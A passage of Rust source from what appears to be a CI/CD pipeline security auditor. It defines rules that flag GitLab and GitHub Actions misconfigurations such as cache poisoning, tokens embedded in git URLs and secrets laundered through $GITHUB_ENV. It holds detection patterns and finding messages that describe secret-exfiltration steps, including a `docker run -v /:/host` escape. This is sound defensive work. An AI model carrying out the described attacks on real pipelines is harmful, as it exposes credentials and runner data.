5245                "Step '{}' uses a docker:dind service AND holds secrets [{}] — a malicious build step can `docker run -v /:/host` from inside dind and exfiltrate the runner's filesystem (other jobs' artifacts, cached creds)",
5246                step.name, preview
5247            ),
5248            recommendation: Recommendation::Manual {
5249                action: "Replace docker-in-docker with kaniko / buildah / img for image builds (no privileged sidecar required), OR isolate the dind job to a dedicated runner pool with no shared workspace and no other secrets in scope.".into(),
5250            },
5251            source: FindingSource::BuiltIn,
5252            extras: FindingExtras::default(),
5253        });
5254    }
5255
5256    findings
5257}
5258
5259/// Substrings (case-insensitive) that identify a GitLab security scanner job
5260/// either by job name or by an `extends:` template name.
5261const SCANNER_PATTERNS: &[&str] = &[
5262    "sast",
5263    "dast",
5264    "secret_detection",
5265    "secret-detection",
5266    "dependency_scanning",
5267    "dependency-scanning",
5268    "container_scanning",
5269    "container-scanning",
5270    "gitleaks",
5271    "trivy",
5272    "grype",
5273    "semgrep",
5274    "bandit",
5275    "snyk",
5276    "license_scanning",
5277    "license-scanning",
5278    "iac_scan",
5279    "iac-scan",
5280    "fuzz",
5281    "api_fuzzing",
5282    "api-fuzzing",
5283    "coverage_fuzzing",
5284    "coverage-fuzzing",
5285];
5286
5287fn step_matches_scanner(step_name: &str, extends: Option<&String>) -> bool {
5288    let lower = step_name.to_ascii_lowercase();
5289    if SCANNER_PATTERNS.iter().any(|p| lower.contains(p)) {
5290        return true;
5291    }
5292    if let Some(ext) = extends {
5293        let elower = ext.to_ascii_lowercase();
5294        if SCANNER_PATTERNS.iter().any(|p| elower.contains(p)) {
5295            return true;
5296        }
5297    }
5298    false
5299}
5300
5301/// Rule: `security_job_silently_skipped` (Medium, Configuration).
5302///
5303/// A security-scanner job (matched by name or `extends:` template) runs with
5304/// `allow_failure: true` and no `rules:` clause that surfaces the failure.
5305/// The pipeline goes green even when the scan errors out — silent-pass is
5306/// worse than no scan because reviewers trust the badge.
5307///
5308/// We can't statically prove the absence of a "surface failures" rule from
5309/// YAML alone, so we fire whenever `allow_failure: true` is set on a scanner
5310/// job and let the operator confirm. The recommendation guides them to the
5311/// fix.
5312pub fn security_job_silently_skipped(graph: &AuthorityGraph) -> Vec<Finding> {
5313    let mut findings = Vec::new();
5314
5315    for step in graph.nodes_of_kind(NodeKind::Step) {
5316        let allow_failure = step
5317            .metadata
5318            .get(META_GITLAB_ALLOW_FAILURE)
5319            .map(|v| v == "true")
5320            .unwrap_or(false);
5321        if !allow_failure {
5322            continue;
5323        }
5324
5325        let extends = step.metadata.get(META_GITLAB_EXTENDS);
5326        if !step_matches_scanner(&step.name, extends) {
5327            continue;
5328        }
5329
5330        let how = match extends {
5331            Some(e) => format!("matched by extends: {e}"),
5332            None => "matched by job name".to_string(),
5333        };
5334
5335        findings.push(Finding {
5336            severity: Severity::Medium,
5337            category: FindingCategory::SecurityJobSilentlySkipped,
5338            path: None,
5339            nodes_involved: vec![step.id],
5340            message: format!(
5341                "Security-scanner job '{}' ({how}) runs with allow_failure: true — when the scan errors out the pipeline still goes green; reviewers trust a badge that is no longer evidence",
5342                step.name
5343            ),
5344            recommendation: Recommendation::Manual {
5345                action: "Either drop `allow_failure: true` and let the scanner gate the pipeline, OR add a follow-up `rules:` clause that surfaces the failure (e.g. a stage that asserts the scan report exists and is non-empty). A scanner that fails closed is worth more than a scanner that fails silently.".into(),
5346            },
5347            source: FindingSource::BuiltIn,
5348            extras: FindingExtras::default(),
5349        });
5350    }
5351
5352    findings
5353}
5354
5355/// Rule: `child_pipeline_trigger_inherits_authority` (Medium, Propagation).
5356///
5357/// A GitLab `trigger:` job (downstream / child pipeline) either runs in
5358/// `merge_request_event` context OR is a *dynamic* child pipeline whose
5359/// included YAML comes from a previous job's `artifact:`. Both shapes mean
5360/// untrusted input shapes the pipeline that runs with the parent project's
5361/// CI_JOB_TOKEN and secrets.
5362pub fn child_pipeline_trigger_inherits_authority(graph: &AuthorityGraph) -> Vec<Finding> {
5363    let graph_is_mr = graph
5364        .metadata
5365        .get(META_TRIGGER)
5366        .map(|v| v == "merge_request")
5367        .unwrap_or(false);
5368
5369    let mut findings = Vec::new();
5370
5371    for step in graph.nodes_of_kind(NodeKind::Step) {
5372        let kind = match step.metadata.get(META_GITLAB_TRIGGER_KIND) {
5373            Some(k) => k.as_str(),
5374            None => continue,
5375        };
5376
5377        let is_dynamic = kind == "dynamic";
5378        let is_mr = graph_is_mr;
5379
5380        if !is_dynamic && !is_mr {
5381            continue;
5382        }
5383
5384        let mut reasons: Vec<&str> = Vec::new();
5385        if is_dynamic {
5386            reasons.push("includes child YAML from a previous job's artifact (dynamic child pipeline — code-injection sink)");
5387        }
5388        if is_mr {
5389            reasons.push(
5390                "runs in merge_request_event context — fork code shapes the downstream pipeline",
5391            );
5392        }
5393        let why = reasons.join(" AND ");
5394
5395        findings.push(Finding {
5396            severity: Severity::Medium,
5397            category: FindingCategory::ChildPipelineTriggerInheritsAuthority,
5398            path: None,
5399            nodes_involved: vec![step.id],
5400            message: format!(
5401                "Trigger job '{}' {why}; the downstream pipeline inherits the parent project's CI_JOB_TOKEN and any reachable secrets",
5402                step.name
5403            ),
5404            recommendation: Recommendation::Manual {
5405                action: "For dynamic child pipelines: validate the generated YAML against a schema before triggering, or pre-stage all child pipeline files in-tree and use `include:` (static) instead of `include: artifact:`. For MR-triggered triggers: gate the downstream with `rules: if: $CI_PIPELINE_SOURCE != 'merge_request_event'` so fork PRs cannot reach it.".into(),
5406            },
5407            source: FindingSource::BuiltIn,
5408            extras: FindingExtras::default(),
5409        });
5410    }
5411
5412    findings
5413}
5414
5415/// Heuristic: cache keys that cross trust boundaries. Returns `Some(reason)`
5416/// when the key is one of the dangerous shapes, `None` when the key is
5417/// scoped tightly enough.
5418fn unsafe_cache_key(key: &str) -> Option<&'static str> {
5419    let trimmed = key.trim();
5420    if trimmed.is_empty() {
5421        // GitLab default key when none is set: `default` — same blast radius as hardcoded.
5422        return Some("absent (defaults to a single shared 'default' key per runner)");
5423    }
5424    // CI_JOB_NAME alone — same name across MR + main = shared key.
5425    if trimmed == "$CI_JOB_NAME"
5426        || trimmed == "${CI_JOB_NAME}"
5427        || trimmed.eq_ignore_ascii_case("$ci_job_name")
5428    {
5429        return Some(
5430            "`$CI_JOB_NAME` only — same name on MR and default-branch jobs share the cache",
5431        );
5432    }
5433    // CI_COMMIT_REF_SLUG alone — handled by caller (depends on policy).
5434    // Otherwise: any key without a $-interpolation is hardcoded → shared.
5435    if !trimmed.contains('$') {
5436        return Some("hardcoded — every job and every branch share the same cache");
5437    }
5438    None
5439}
5440
5441/// Rule: `cache_key_crosses_trust_boundary` (Medium, Supply Chain).
5442///
5443/// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
5444/// only, or `$CI_COMMIT_REF_SLUG` *without* a `policy: pull` restriction.
5445/// Caches are stored per-runner keyed by `key:` — a poisoned MR can push a
5446/// malicious `node_modules/` cache that the next default-branch job
5447/// downloads and executes.
5448pub fn cache_key_crosses_trust_boundary(graph: &AuthorityGraph) -> Vec<Finding> {
5449    let mut findings = Vec::new();
5450
5451    for step in graph.nodes_of_kind(NodeKind::Step) {
5452        let key = match step.metadata.get(META_GITLAB_CACHE_KEY) {
5453            Some(k) => k,
5454            None => continue,
5455        };
5456        let policy = step
5457            .metadata
5458            .get(META_GITLAB_CACHE_POLICY)
5459            .map(|s| s.as_str())
5460            .unwrap_or("pull-push"); // GitLab's runtime default
5461
5462        // pull-only consumers cannot poison the cache — skip those
5463        let is_pull_only = matches!(policy, "pull");
5464
5465        let trimmed = key.trim();
5466
5467        // Per-ref key: $CI_COMMIT_REF_SLUG. Safe ONLY when the consuming jobs
5468        // restrict themselves to `policy: pull`. Without that restriction, an
5469        // MR job pushes a cache the next protected-branch job downloads
5470        // (refs are *namespaced* but not *isolated* — the same key on `main`
5471        // shadows over time and the runner's per-key store is shared).
5472        let is_ref_slug = trimmed == "$CI_COMMIT_REF_SLUG"
5473            || trimmed == "${CI_COMMIT_REF_SLUG}"
5474            || trimmed.eq_ignore_ascii_case("$ci_commit_ref_slug");
5475        if is_ref_slug {
5476            if !is_pull_only {
5477                findings.push(Finding {
5478                    severity: Severity::Medium,
5479                    category: FindingCategory::CacheKeyCrossesTrustBoundary,
5480                    path: None,
5481                    nodes_involved: vec![step.id],
5482                    message: format!(
5483                        "Step '{}' uses cache key `$CI_COMMIT_REF_SLUG` with policy `{policy}` — MR jobs can push poisoned caches that subsequent default-branch jobs restore (npm install / Maven plugin resolution executes cached artifacts)",
5484                        step.name
5485                    ),
5486                    recommendation: Recommendation::Manual {
5487                        action: "Set `policy: pull` on jobs that consume the cache from a different trust context (default-branch, protected refs), and restrict `policy: push` to a dedicated job that runs only on protected branches. Combine with `key: { files: [package-lock.json] }` so cache reuse requires identical input hashes.".into(),
5488                    },
5489                    source: FindingSource::BuiltIn,
5490                    extras: FindingExtras::default(),
5491                });
5492            }
5493            continue;
5494        }
5495
5496        if let Some(reason) = unsafe_cache_key(key) {
5497            findings.push(Finding {
5498                severity: Severity::Medium,
5499                category: FindingCategory::CacheKeyCrossesTrustBoundary,
5500                path: None,
5501                nodes_involved: vec![step.id],
5502                message: format!(
5503                    "Step '{}' has cache key `{key}` ({reason}) with policy `{policy}` — caches cross trust boundaries; an MR or fork can stage a poisoned cache that the next protected-branch job restores and executes",
5504                    step.name
5505                ),
5506                recommendation: Recommendation::Manual {
5507                    action: "Scope the cache key to inputs only an authorized run can produce, e.g. `key: { files: [package-lock.json] }` so the key changes when dependencies change, and combine with `policy: pull` on consumers in higher trust contexts.".into(),
5508                },
5509                source: FindingSource::BuiltIn,
5510                extras: FindingExtras::default(),
5511            });
5512        }
5513    }
5514
5515    findings
5516}
5517
5518/// Local view-struct mirroring `taudit_parse_gitlab::IncludeEntry` — kept here
5519/// so taudit-core does not depend on taudit-parse-gitlab. The two crates pass
5520/// data only through the JSON blob in `META_GITLAB_INCLUDES`.
5521mod taudit_parse_gitlab_include_view {
5522    use serde::Deserialize;
5523    #[derive(Debug, Clone, Deserialize)]
5524    pub struct IncludeView {
5525        pub kind: String,
5526        pub target: String,
5527        pub git_ref: String,
5528    }
5529}
5530
5531/// Rule: a CI script body constructs an HTTPS git URL with credentials
5532/// embedded directly in the URL (`https://user:$TOKEN@host/...`) and
5533/// invokes git against it (`git clone`, `git push`, `git remote set-url`,
5534/// `git fetch`, `git ls-remote`).
5535///
5536/// Detection: scan `META_SCRIPT_BODY` for the regex equivalent
5537/// `https://[^/\s'"]*:\$\{?[A-Z0-9_]*(TOKEN|PAT|PASSWORD|PASSWD|KEY|SECRET)[A-Z0-9_]*\}?@`
5538/// implemented byte-by-byte to keep the dependency surface minimal.
5539///
5540/// Severity: **High**. Embedded credentials persist in `.git/config`,
5541/// are visible to every subsequent process via `ps`/`/proc/*/cmdline`,
5542/// land in `GIT_TRACE` output when set, and may be uploaded as part of
5543/// any artifact that bundles the workspace.
5544pub fn pat_embedded_in_git_remote_url(graph: &AuthorityGraph) -> Vec<Finding> {
5545    let mut findings = Vec::new();
5546
5547    for step in graph.nodes_of_kind(NodeKind::Step) {
5548        let body = match step.metadata.get(META_SCRIPT_BODY) {
5549            Some(b) if !b.trim().is_empty() => b,
5550            _ => continue,
5551        };
5552
5553        let hits = find_credential_embedded_git_urls(body);
5554        if hits.is_empty() {
5555            continue;
5556        }
5557
5558        // Cap message previews so we don't spam logs with huge URLs.
5559        let preview: String = hits
5560            .iter()
5561            .take(2)
5562            .map(|s| s.as_str())
5563            .collect::<Vec<_>>()
5564            .join(", ");
5565        let suffix = if hits.len() > 2 {
5566            format!(", and {} more", hits.len() - 2)
5567        } else {
5568            String::new()
5569        };
5570
5571        findings.push(Finding {
5572            severity: Severity::High,
5573            category: FindingCategory::PatEmbeddedInGitRemoteUrl,
5574            path: None,
5575            nodes_involved: vec![step.id],
5576            message: format!(
5577                "Step '{}' embeds a credential variable directly in a git remote URL ({}{}). The token value is exposed in process argv (visible to `ps`), persists in .git/config for the rest of the job, and is captured by GIT_TRACE if enabled.",
5578                step.name, preview, suffix
5579            ),
5580            recommendation: Recommendation::Manual {
5581                action: "Use a credential helper or env-var-based authentication instead of inlining the token in the URL. For GitLab CI, prefer `git -c http.extraHeader=\"PRIVATE-TOKEN: $PAT_TOKEN\" push <url>`, or set `CI_JOB_TOKEN` as the credential helper. Never construct `https://user:$TOKEN@host/...` URLs.".into(),
5582            },
5583            source: FindingSource::BuiltIn,
5584            extras: FindingExtras::default(),
5585        });
5586    }
5587
5588    findings
5589}
5590
5591/// Find substrings in `body` that look like
5592/// `https://<userpart>:<token-var-ref>@host`. Returns up to 8 unique hits
5593/// (stable order). The token variable is required to look like a credential
5594/// name (TOKEN/PAT/PASSWORD/PASSWD/KEY/SECRET) — bare `$VAR` references
5595/// without a credential-shaped name don't fire to keep the false-positive
5596/// rate down.
5597fn find_credential_embedded_git_urls(body: &str) -> Vec<String> {
5598    let mut hits: Vec<String> = Vec::new();
5599    let bytes = body.as_bytes();
5600    let mut i = 0usize;
5601    let needle = b"https://";
5602
5603    while i + needle.len() <= bytes.len() {
5604        if &bytes[i..i + needle.len()] != needle {
5605            i += 1;
5606            continue;
5607        }
5608        // Find the end of the URL "authority" component — terminator is the
5609        // next `/`, whitespace, quote, or end-of-string.
5610        let mut end = i + needle.len();
5611        while end < bytes.len() {
5612            let c = bytes[end];
5613            if c == b'/'
5614                || c == b' '
5615                || c == b'\t'
5616                || c == b'\n'
5617                || c == b'\r'
5618                || c == b'"'
5619                || c == b'\''
5620                || c == b'`'
5621            {
5622                break;
5623            }
5624            end += 1;
5625        }
5626        let authority = &body[i + needle.len()..end];
5627
5628        if url_authority_has_embedded_credential_var(authority) {
5629            // Capture the full URL up to the path delimiter for the message.
5630            let urlend = end;
5631            let url = &body[i..urlend];
5632            let url_short = if url.len() > 120 {
5633                format!("{}…", &url[..120])
5634            } else {
5635                url.to_string()
5636            };
5637            if !hits.contains(&url_short) {
5638                hits.push(url_short);
5639                if hits.len() == 8 {
5640                    break;
5641                }
5642            }
5643        }
5644
5645        i = end.max(i + 1);
5646    }
5647
5648    hits
5649}
5650
5651/// Decide whether a URL's authority component (everything after `https://`
5652/// and before the path) contains a credential-shaped variable reference of
5653/// the form `user:$TOKEN_NAME@host` or `user:${TOKEN_NAME}@host`.
5654fn url_authority_has_embedded_credential_var(authority: &str) -> bool {
5655    // Must contain both ':' and '@' with ':' before '@'.
5656    let at = match authority.find('@') {
5657        Some(p) => p,
5658        None => return false,
5659    };
5660    let userinfo = &authority[..at];
5661    let colon = match userinfo.find(':') {
5662        Some(p) => p,
5663        None => return false,
5664    };
5665    let pw_part = &userinfo[colon + 1..];
5666    if pw_part.is_empty() {
5667        return false;
5668    }
5669    // Strip optional `${...}` braces so we can inspect the variable name.
5670    let pw_inner = pw_part.trim_start_matches('$');
5671    let pw_inner = pw_inner.trim_start_matches('{').trim_end_matches('}');
5672    // Variable name must look like an env var (uppercase, digits, underscores)
5673    // and contain a credential-shaped fragment.
5674    if pw_inner.is_empty() {
5675        return false;
5676    }
5677    let looks_like_var = pw_inner
5678        .chars()
5679        .all(|c| c.is_ascii_uppercase() || c.is_ascii_digit() || c == '_');
5680    if !looks_like_var {
5681        return false;
5682    }
5683    const CRED_FRAGMENTS: &[&str] = &[
5684        "TOKEN", "PAT", "PASSWORD", "PASSWD", "KEY", "SECRET", "CRED",
5685    ];
5686    CRED_FRAGMENTS.iter().any(|frag| pw_inner.contains(frag))
5687}
5688
5689/// Rule: a CI script triggers a different project's pipeline via the GitLab
5690/// REST API using `CI_JOB_TOKEN` and forwards variables via the
5691/// `variables[KEY]=value` query/form parameter. Cross-project authority
5692/// bridge — the downstream project's security depends on the trust contract
5693/// between the two projects, and variable values flowing across that
5694/// boundary may originate from MR/fork context the attacker controls.
5695///
5696/// Severity: **Medium**. Higher-risk when the triggering job runs on MR
5697/// pipelines (`META_TRIGGER == "merge_request"`) — the message annotates
5698/// that case explicitly so operators see the elevated risk.
5699pub fn ci_token_triggers_downstream_with_variable_passthrough(
5700    graph: &AuthorityGraph,
5701) -> Vec<Finding> {
5702    let mut findings = Vec::new();
5703    let pipeline_is_mr_triggered = graph
5704        .metadata
5705        .get(META_TRIGGER)
5706        .map(|t| t == "merge_request")
5707        .unwrap_or(false);
5708
5709    for step in graph.nodes_of_kind(NodeKind::Step) {
5710        let body = match step.metadata.get(META_SCRIPT_BODY) {
5711            Some(b) if !b.trim().is_empty() => b,
5712            _ => continue,
5713        };
5714
5715        if !script_triggers_downstream_with_passthrough(body) {
5716            continue;
5717        }
5718
5719        let suffix = if pipeline_is_mr_triggered {
5720            " (pipeline triggered on merge_request — variable values may originate from attacker-controlled MR context)"
5721        } else {
5722            ""
5723        };
5724
5725        findings.push(Finding {
5726            severity: Severity::Medium,
5727            category: FindingCategory::CiTokenTriggersDownstreamWithVariablePassthrough,
5728            path: None,
5729            nodes_involved: vec![step.id],
5730            message: format!(
5731                "Step '{}' triggers a downstream pipeline via the GitLab REST API using CI_JOB_TOKEN and forwards variables[…] in the request — this is a cross-project authority channel that bypasses the parent-child trust model{}",
5732                step.name, suffix
5733            ),
5734            recommendation: Recommendation::Manual {
5735                action: "Constrain which variables the downstream pipeline accepts (use `variables.X.expand: false` and explicit allowlists), prefer pipeline triggers via `trigger:` keyword with `strategy: depend` over `curl … CI_JOB_TOKEN …`, and audit the receiving project's CI/CD settings to ensure it does not honour caller-supplied variables on protected refs.".into(),
5736            },
5737            source: FindingSource::BuiltIn,
5738                extras: FindingExtras::default(),
5739});
5740    }
5741
5742    findings
5743}
5744
5745/// Returns true if `body` contains a `curl` (or wget) call that hits a
5746/// GitLab `/trigger/pipeline` endpoint with both `CI_JOB_TOKEN` and a
5747/// `variables[…]` field. We accept either query-string form
5748/// (`variables[X]=...`) or form-data form (`-F "variables[X]=..."`).
5749fn script_triggers_downstream_with_passthrough(body: &str) -> bool {
5750    let lower = body.to_lowercase();
5751    // Match a triggering call: must mention `trigger/pipeline` and reference
5752    // CI_JOB_TOKEN, plus carry a `variables[` token.
5753    let trigger_endpoint = lower.contains("trigger/pipeline")
5754        || lower.contains("/api/v4/projects/") && lower.contains("/trigger");
5755    if !trigger_endpoint {
5756        return false;
5757    }
5758    let has_token = lower.contains("ci_job_token");
5759    if !has_token {
5760        return false;
5761    }
5762    body.contains("variables[")
5763}
5764
5765/// Rule: a job emits an `artifacts.reports.dotenv: <file>` artifact whose
5766/// contents become pipeline variables for any consumer linked via `needs:`
5767/// or `dependencies:`. A consumer in a later stage that targets a
5768/// production-named environment inherits those variables transparently.
5769/// Producer-side risk amplifies when the script reads attacker-influenced
5770/// inputs (`CI_COMMIT_REF_NAME`, `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`,
5771/// `CI_COMMIT_TAG`, branch/commit derived strings).
5772///
5773/// Severity: **High** when a producer→consumer chain exists with a
5774/// production-like environment on the consumer; **Medium** when the chain
5775/// exists but no production environment is detected (still a covert
5776/// variable-promotion channel).
5777pub fn dotenv_artifact_flows_to_privileged_deployment(graph: &AuthorityGraph) -> Vec<Finding> {
5778    let mut findings = Vec::new();
5779
5780    // Build (producer name -> producer step id, dotenv file) index.
5781    let mut producers: std::collections::HashMap<String, (NodeId, String)> =
5782        std::collections::HashMap::new();
5783    for step in graph.nodes_of_kind(NodeKind::Step) {
5784        if let Some(file) = step.metadata.get(META_DOTENV_FILE) {
5785            if let Some(job) = step.metadata.get(META_JOB_NAME) {
5786                producers.insert(job.clone(), (step.id, file.clone()));
5787            }
5788        }
5789    }
5790    if producers.is_empty() {
5791        return findings;
5792    }
5793
5794    for consumer in graph.nodes_of_kind(NodeKind::Step) {
5795        let needs_csv = match consumer.metadata.get(META_NEEDS) {
5796            Some(s) if !s.is_empty() => s,
5797            _ => continue,
5798        };
5799        let upstream_jobs: Vec<&str> = needs_csv.split(',').filter(|s| !s.is_empty()).collect();
5800        let matched: Vec<&(NodeId, String)> = upstream_jobs
5801            .iter()
5802            .filter_map(|j| producers.get(*j))
5803            .collect();
5804        if matched.is_empty() {
5805            continue;
5806        }
5807
5808        let env_name = consumer
5809            .metadata
5810            .get(META_ENVIRONMENT_NAME)
5811            .map(String::as_str)
5812            .unwrap_or("");
5813        // Production-like signal: explicit `environment.name:` value, OR
5814        // (fallback) the job name itself encodes a production marker.
5815        // GitLab pipelines often skip the explicit `environment:` block
5816        // and rely on stage/job naming conventions like `deploy-prod`.
5817        let consumer_job = consumer
5818            .metadata
5819            .get(META_JOB_NAME)
5820            .map(String::as_str)
5821            .unwrap_or(consumer.name.as_str());
5822        let production_like =
5823            is_production_environment(env_name) || is_production_environment(consumer_job);
5824
5825        // Decide elevation: production-like consumer environment OR
5826        // producer script ingests attacker-influenced CI variables.
5827        let producer_uses_untrusted_input = matched.iter().any(|(pid, _)| {
5828            graph
5829                .node(*pid)
5830                .and_then(|n| n.metadata.get(META_SCRIPT_BODY))
5831                .map(|b| script_uses_attacker_influenced_ci_var(b))
5832                .unwrap_or(false)
5833        });
5834
5835        if !production_like && !producer_uses_untrusted_input {
5836            continue; // benign dotenv flow — skip
5837        }
5838
5839        let severity = if production_like {
5840            Severity::High
5841        } else {
5842            Severity::Medium
5843        };
5844
5845        let producer_names: Vec<String> = upstream_jobs
5846            .iter()
5847            .filter(|j| producers.contains_key(**j))
5848            .map(|s| (*s).to_string())
5849            .collect();
5850
5851        let env_suffix = if production_like {
5852            if env_name.is_empty() {
5853                format!(" targeting production-like job name '{consumer_job}'")
5854            } else {
5855                format!(" targeting production-like environment '{env_name}'")
5856            }
5857        } else {
5858            String::new()
5859        };
5860        let trust_suffix = if producer_uses_untrusted_input {
5861            " (producer script reads attacker-influenced CI variables — branch/MR-source names propagate into the dotenv values)"
5862        } else {
5863            ""
5864        };
5865
5866        let mut nodes_involved = vec![consumer.id];
5867        nodes_involved.extend(matched.iter().map(|(id, _)| *id));
5868
5869        findings.push(Finding {
5870            severity,
5871            category: FindingCategory::DotenvArtifactFlowsToPrivilegedDeployment,
5872            path: None,
5873            nodes_involved,
5874            message: format!(
5875                "Step '{}' consumes a dotenv artifact from upstream job(s) [{}]{}{} — variables defined in the upstream's `artifacts.reports.dotenv` are silently promoted to the pipeline variable namespace, indistinguishable from pipeline-level variables in subsequent jobs",
5876                consumer.name,
5877                producer_names.join(", "),
5878                env_suffix,
5879                trust_suffix
5880            ),
5881            recommendation: Recommendation::Manual {
5882                action: "Treat dotenv outputs as untrusted: pin the producer to a protected branch/tag context only, validate variable values in the consumer before use, and prefer explicit `needs:[…].artifacts: false` plus pipeline-scoped variables for deployment selection. Never let dotenv-promoted values choose service connections, deploy targets, or registry destinations without an allowlist check.".into(),
5883            },
5884            source: FindingSource::BuiltIn,
5885                extras: FindingExtras::default(),
5886});
5887    }
5888
5889    findings
5890}
5891
5892/// True when an environment name matches common production-like patterns.
5893fn is_production_environment(name: &str) -> bool {
5894    if name.is_empty() {
5895        return false;
5896    }
5897    let lower = name.to_lowercase();
5898    const TOKENS: &[&str] = &["prod", "production", "prd", "live"];
5899    for token in TOKENS {
5900        // Match either as a whole word or a `/`-separated segment, e.g.
5901        // `production/eu-west-1`, `prod-cluster`.
5902        if lower == *token {
5903            return true;
5904        }
5905        if lower.starts_with(&format!("{token}-"))
5906            || lower.starts_with(&format!("{token}/"))
5907            || lower.contains(&format!("/{token}/"))
5908            || lower.contains(&format!("-{token}-"))
5909            || lower.ends_with(&format!("/{token}"))
5910            || lower.ends_with(&format!("-{token}"))
5911        {
5912            return true;
5913        }
5914    }
5915    false
5916}
5917
5918/// True when an inline script reads CI variables that carry attacker-controllable
5919/// content (branch names, MR source/target refs, tag refs, commit messages).
5920fn script_uses_attacker_influenced_ci_var(script: &str) -> bool {
5921    const NEEDLES: &[&str] = &[
5922        "CI_COMMIT_REF_NAME",
5923        "CI_COMMIT_BRANCH",
5924        "CI_COMMIT_TAG",
5925        "CI_COMMIT_MESSAGE",
5926        "CI_COMMIT_TITLE",
5927        "CI_COMMIT_DESCRIPTION",
5928        "CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
5929        "CI_MERGE_REQUEST_TITLE",
5930        "CI_MERGE_REQUEST_DESCRIPTION",
5931    ];
5932    NEEDLES.iter().any(|n| script.contains(n))
5933}
5934
5935/// Rule: secret laundered through `$GITHUB_ENV` reaches an untrusted consumer
5936/// in the same job — composition gap between `self_mutating_pipeline` (the
5937/// gate-write detector) and `untrusted_with_authority` (the direct-access
5938/// detector).
5939///
5940/// **Pattern (R2 attack #3):**
5941/// ```yaml
5942/// jobs:
5943///   build:
5944///     steps:
5945///       - name: setup
5946///         run: echo "CLOUD_KEY=${{ secrets.CLOUD_KEY }}" >> $GITHUB_ENV   # writer
5947///       - uses: some-org/deploy@main                                        # untrusted
5948///         with:
5949///           key: ${{ env.CLOUD_KEY }}                                       # consumer
5950/// ```
5951/// The writer trips `self_mutating_pipeline`. The consumer never gets a
5952/// `HasAccessTo` edge to `CLOUD_KEY` (the value is sourced from the runner
5953/// env, not the secrets store) so neither `untrusted_with_authority` nor
5954/// `authority_propagation` fire — the env-gate launders the trust zone.
5955///
5956/// **Detection:** for every Step in the same job:
5957///   - Writer: `META_WRITES_ENV_GATE = "true"` AND has `HasAccessTo` to a
5958///     Secret/Identity (the value being laundered must derive from authority)
5959///   - Consumer: appears later in the job (NodeId order tracks declaration
5960///     order), trust zone is `Untrusted` or `ThirdParty`, and carries
5961///     `META_READS_ENV = "true"` (stamped by the parser when the step
5962///     references `${{ env.X }}` in `with:` / `run:`)
5963///
5964/// Same-job constraint enforced via `META_JOB_NAME` — the env gate only
5965/// propagates within a job, so cross-job pairs are not flagged.
5966pub fn secret_via_env_gate_to_untrusted_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
5967    let mut findings = Vec::new();
5968
5969    // Step 1: enumerate writer-with-secret nodes, paired with the laundered
5970    // authority names so the finding message can name them. We capture the
5971    // node id in declaration order so the same-job ordering check below is a
5972    // simple comparison rather than an O(n²) scan.
5973    struct Writer<'a> {
5974        id: NodeId,
5975        job: &'a str,
5976        name: &'a str,
5977        secrets: Vec<&'a str>,
5978    }
5979    let writers: Vec<Writer<'_>> = graph
5980        .nodes_of_kind(NodeKind::Step)
5981        .filter(|step| {
5982            step.metadata
5983                .get(META_WRITES_ENV_GATE)
5984                .map(|v| v == "true")
5985                .unwrap_or(false)
5986        })
5987        .filter_map(|step| {
5988            let job = step.metadata.get(META_JOB_NAME)?.as_str();
5989            // Must hold authority — collect Secret/Identity names reachable
5990            // via HasAccessTo. An env-gate write that doesn't carry any
5991            // authority is the harmless "ECHO ROUTE=/api >> $GITHUB_ENV"
5992            // case; not in scope for this rule.
5993            let secrets: Vec<&str> = graph
5994                .edges_from(step.id)
5995                .filter(|e| e.kind == EdgeKind::HasAccessTo)
5996                .filter_map(|e| graph.node(e.to))
5997                .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
5998                .map(|n| n.name.as_str())
5999                .collect();
6000            if secrets.is_empty() {
6001                return None;
6002            }
6003            Some(Writer {
6004                id: step.id,
6005                job,
6006                name: step.name.as_str(),
6007                secrets,
6008            })
6009        })
6010        .collect();
6011
6012    if writers.is_empty() {
6013        return findings;
6014    }
6015
6016    // Step 2: for every consumer step that reads env, find the writer(s) it
6017    // could be laundering from.
6018    for consumer in graph.nodes_of_kind(NodeKind::Step) {
6019        // Consumer must read the runner env.
6020        let reads_env = consumer
6021            .metadata
6022            .get(META_READS_ENV)
6023            .map(|v| v == "true")
6024            .unwrap_or(false);
6025        if !reads_env {
6026            continue;
6027        }
6028
6029        // Consumer must run with reduced trust — first-party readers are
6030        // already accounted for elsewhere and would be a high-FP class.
6031        if !matches!(
6032            consumer.trust_zone,
6033            TrustZone::Untrusted | TrustZone::ThirdParty
6034        ) {
6035            continue;
6036        }
6037
6038        let consumer_job = match consumer.metadata.get(META_JOB_NAME) {
6039            Some(j) => j.as_str(),
6040            None => continue,
6041        };
6042
6043        // Find writers in the same job that appear earlier (NodeId order
6044        // mirrors declaration order — see GHA parser, ADO parser).
6045        let upstream: Vec<&Writer<'_>> = writers
6046            .iter()
6047            .filter(|w| w.job == consumer_job && w.id < consumer.id)
6048            .collect();
6049
6050        if upstream.is_empty() {
6051            continue;
6052        }
6053
6054        // Aggregate the laundered authority names across all writers so
6055        // operators see the full set of credentials potentially reaching
6056        // the untrusted step. Stable ordering, dedup'd.
6057        let mut secret_labels: Vec<&str> = upstream
6058            .iter()
6059            .flat_map(|w| w.secrets.iter().copied())
6060            .collect();
6061        secret_labels.sort_unstable();
6062        secret_labels.dedup();
6063        let writer_names: Vec<&str> = upstream.iter().map(|w| w.name).collect();
6064
6065        let mut nodes_involved = vec![consumer.id];
6066        nodes_involved.extend(upstream.iter().map(|w| w.id));
6067        // Include the laundered Secret/Identity nodes themselves so the
6068        // fingerprint and downstream consumers can attribute the finding
6069        // to a specific credential.
6070        for w in &upstream {
6071            for e in graph.edges_from(w.id) {
6072                if e.kind == EdgeKind::HasAccessTo
6073                    && graph
6074                        .node(e.to)
6075                        .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6076                        .unwrap_or(false)
6077                    && !nodes_involved.contains(&e.to)
6078                {
6079                    nodes_involved.push(e.to);
6080                }
6081            }
6082        }
6083
6084        findings.push(Finding {
6085            severity: Severity::Critical,
6086            category: FindingCategory::SecretViaEnvGateToUntrustedConsumer,
6087            path: None,
6088            nodes_involved,
6089            message: format!(
6090                "Untrusted consumer '{}' in job '{}' reads from $GITHUB_ENV after step(s) [{}] laundered authority [{}] through the env gate — secret reaches untrusted code without ever appearing in a HasAccessTo edge",
6091                consumer.name,
6092                consumer_job,
6093                writer_names.join(", "),
